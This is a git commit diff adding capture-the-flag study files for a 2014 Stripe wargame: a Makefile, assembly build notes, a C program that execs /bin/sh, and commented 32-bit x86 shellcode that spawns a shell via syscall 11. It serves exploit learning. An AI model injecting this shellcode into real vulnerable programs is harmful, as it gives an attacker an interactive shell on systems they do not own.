9447

2025-12-15 15:59:11 -05:00 · 2014-12-02 10:19:52 -05:00 · 2014-12-02 10:19:52 -05:00 · 36356bcc36
commit 36356bcc36
parent 84df40b7cb
77 changed files with 203 additions and 27 deletions
--- a/CTFs_and_WarGames/2014/STRIPE_1-2-3/1/shellcode/Makefile
+++ b/CTFs_and_WarGames/2014/STRIPE_1-2-3/1/shellcode/Makefile
@ -0,0 +1,2 @@
+shell: simplest_shellcode.c
+	gcc -static -g -o shell simplest_shellcode.c
--- a/CTFs_and_WarGames/2014/STRIPE_1-2-3/1/shellcode/how_to_compile_asm_32.md
+++ b/CTFs_and_WarGames/2014/STRIPE_1-2-3/1/shellcode/how_to_compile_asm_32.md
@ -0,0 +1,5 @@
+as --32 -o s.o   s.s  
+ld -m elf_i386 -o s s.o 
+./s
+objdump -d s
+
--- a/CTFs_and_WarGames/2014/STRIPE_1-2-3/1/shellcode/simplest_shellcode.c
+++ b/CTFs_and_WarGames/2014/STRIPE_1-2-3/1/shellcode/simplest_shellcode.c
@ -0,0 +1,9 @@
+#include <stdlib.h>
+int main()
+{
+  char *array[2];
+  array[0] = "/bin/sh";
+  array[1] = NULL;
+  execve(array[0], array, NULL);
+  exit(0);
+}
--- a/CTFs_and_WarGames/2014/STRIPE_1-2-3/1/shellcode/simplest_shellcode_32.s
+++ b/CTFs_and_WarGames/2014/STRIPE_1-2-3/1/shellcode/simplest_shellcode_32.s
@ -0,0 +1,16 @@
+.code32
+.text
+.globl _start
+
+_start:
+  xorl %eax, %eax     /* We need to push a null terminated string to the stack */
+  pushl %eax          /* So first, push a null */
+  pushl $0x68732f2f   /* Push //sh */
+  pushl $0x6e69622f   /* push /bin */
+  movl  %esp, %ebx    /* Store the %esp of /bin/sh into %ebx */
+  pushl %eax          /* Since eax is still null, let's use it again */
+  pushl %ebx          /* Now we can writ the /bin/sh again for **argv */
+  movl  %esp, %ecx    /* Write argv into %ecx */
+  xorl  %edx, %edx    /* NULL out edx */
+  movb  $0xb, %al     /* Write syscall 11 into %al */
+  int $0x80           /* Interrupt the system */